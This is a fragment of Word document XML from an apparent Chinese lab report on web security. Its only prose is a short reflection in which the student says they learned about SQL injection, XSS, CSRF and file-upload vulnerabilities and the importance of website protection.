            <w:tcW w:w="9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E00C" w14:textId="77777777" w:rsidR="00D20E9B" w:rsidRPr="003F5331" w:rsidRDefault="00D20E9B" w:rsidP="00D20E9B">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="448" w:hangingChars="186" w:hanging="448"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004652D3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>实验分析总结及心得</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5757544B" w14:textId="2C8EBE28" w:rsidR="00D20E9B" w:rsidRPr="00A44E55" w:rsidRDefault="00593A8A" w:rsidP="00593A8A">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLineChars="200" w:firstLine="40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85927">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>通过这次实验，我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SQL注入攻击、XSS攻击、CSRF攻击以及文件上传漏洞等安全知识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有了新的认识，学会了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这些攻击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的基本操作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，对它们的攻击流程有了一个清晰的思路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。也对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这几种不同层面的攻击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概念有了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更深入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的理解</w:t>
            </w:r>
            <w:r w:rsidRPr="00785927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明白了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网站安全防护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</w:t>
            </w:r>
            <w:r w:rsidRPr="00785927">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>重要性。提高了自己的安全意识。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FE08061" w14:textId="77777777" w:rsidR="00CA6972" w:rsidRPr="004652D3" w:rsidRDefault="00CA6972">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00CA6972" w:rsidRPr="004652D3" w:rsidSect="007B228C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9CD0B" w14:textId="77777777" w:rsidR="00047D52" w:rsidRDefault="00047D52" w:rsidP="00CA6972">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4639729F" w14:textId="77777777" w:rsidR="00047D52" w:rsidRDefault="00047D52" w:rsidP="00CA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1563773"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w14:paraId="147E1666" w14:textId="77777777" w:rsidR="0015260F" w:rsidRDefault="001526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2E04A5" w14:textId="77777777" w:rsidR="007B228C" w:rsidRDefault="007B22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87619" w14:textId="77777777" w:rsidR="00047D52" w:rsidRDefault="00047D52" w:rsidP="00CA6972">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="79D1C2FC" w14:textId="77777777" w:rsidR="00047D52" w:rsidRDefault="00047D52" w:rsidP="00CA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B71"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE2C1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34531"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53B0F320"/>
    <w:lvl w:ilvl="0" w:tplc="BB261B58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F57837"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B3F08986"/>
    <w:lvl w:ilvl="0" w:tplc="CF56B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D4041"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F68C08FE"/>
    <w:lvl w:ilvl="0" w:tplc="0CE87758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" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3BB26815"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="89F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13E90"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A984CDFC"/>
    <w:lvl w:ilvl="0" w:tplc="CFF0E208">
      <w:start w:val="1"/>
      <w:numFmt w:val="japaneseCounting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D45CF7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5E8EF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011B0D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D9B45F04"/>
    <w:lvl w:ilvl="0" w:tplc="96A013FA">
      <w:start w:val="8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76D87C59"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="77FC915E"/>
    <w:lvl w:ilvl="0" w:tplc="0234F4CA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32"/>
    <w:rsid w:val="00034C75"/>
    <w:rsid w:val="00047D52"/>
    <w:rsid w:val="0009458A"/>
    <w:rsid w:val="0015260F"/>
    <w:rsid w:val="001831FA"/>
    <w:rsid w:val="001E1D55"/>
    <w:rsid w:val="002065C6"/>
    <w:rsid w:val="00234B6E"/>
    <w:rsid w:val="00244034"/>
    <w:rsid w:val="00251AB4"/>
    <w:rsid w:val="00257C4A"/>
    <w:rsid w:val="00276906"/>
    <w:rsid w:val="002B2FAD"/>
    <w:rsid w:val="00377D63"/>
    <w:rsid w:val="003B0751"/>
    <w:rsid w:val="003E7D84"/>
    <w:rsid w:val="003F5331"/>
    <w:rsid w:val="004652D3"/>
    <w:rsid w:val="004C7C73"/>
    <w:rsid w:val="00502E0C"/>
    <w:rsid w:val="00522D89"/>
    <w:rsid w:val="00523019"/>
    <w:rsid w:val="00544F76"/>
    <w:rsid w:val="005503F4"/>
    <w:rsid w:val="005548C7"/>
    <w:rsid w:val="00560B0C"/>
    <w:rsid w:val="00591D8B"/>
    <w:rsid w:val="00593A8A"/>
    <w:rsid w:val="005B330D"/>
    <w:rsid w:val="006066B2"/>
    <w:rsid w:val="00653AF1"/>
    <w:rsid w:val="00665AF2"/>
    <w:rsid w:val="00741277"/>
    <w:rsid w:val="00742A2D"/>
    <w:rsid w:val="00743426"/>
    <w:rsid w:val="007957D3"/>
    <w:rsid w:val="007B228C"/>
    <w:rsid w:val="007C14BD"/>
    <w:rsid w:val="007F51E5"/>
    <w:rsid w:val="008006A6"/>
    <w:rsid w:val="0080333D"/>
    <w:rsid w:val="00855B69"/>
    <w:rsid w:val="008F548C"/>
    <w:rsid w:val="00905DE5"/>
    <w:rsid w:val="00913A6A"/>
    <w:rsid w:val="009354FE"/>
    <w:rsid w:val="00982C05"/>
    <w:rsid w:val="009F776F"/>
    <w:rsid w:val="00A44E55"/>
    <w:rsid w:val="00A7460E"/>
    <w:rsid w:val="00A93F97"/>
    <w:rsid w:val="00AB78C8"/>
    <w:rsid w:val="00B13099"/>
    <w:rsid w:val="00B20147"/>
    <w:rsid w:val="00B5064A"/>
    <w:rsid w:val="00B61C76"/>
    <w:rsid w:val="00B82A32"/>
    <w:rsid w:val="00B92AE8"/>
    <w:rsid w:val="00B966AB"/>
    <w:rsid w:val="00C312A0"/>
    <w:rsid w:val="00C97741"/>
    <w:rsid w:val="00CA6972"/>
    <w:rsid w:val="00CB0B55"/>
    <w:rsid w:val="00CB3687"/>
    <w:rsid w:val="00CB5672"/>
    <w:rsid w:val="00D20E9B"/>
    <w:rsid w:val="00DD0E61"/>
    <w:rsid w:val="00DF7DFD"/>
    <w:rsid w:val="00E04BFF"/>
    <w:rsid w:val="00E81F41"/>
    <w:rsid w:val="00E908C3"/>
    <w:rsid w:val="00F3420E"/>
    <w:rsid w:val="00F90570"/>
    <w:rsid w:val="00FA307A"/>
    <w:rsid w:val="00FF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C228C"/>
  <w15:docId w15:val="{98ED0C2C-1CA1-43FE-8BF3-FCD4B17D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3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82A3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82A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2A32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65AF2"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CA6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6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6972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C9774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97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廖 越强</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <cp:lastPrinted>2018-10-19T11:40:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-10T04:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-15T10:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>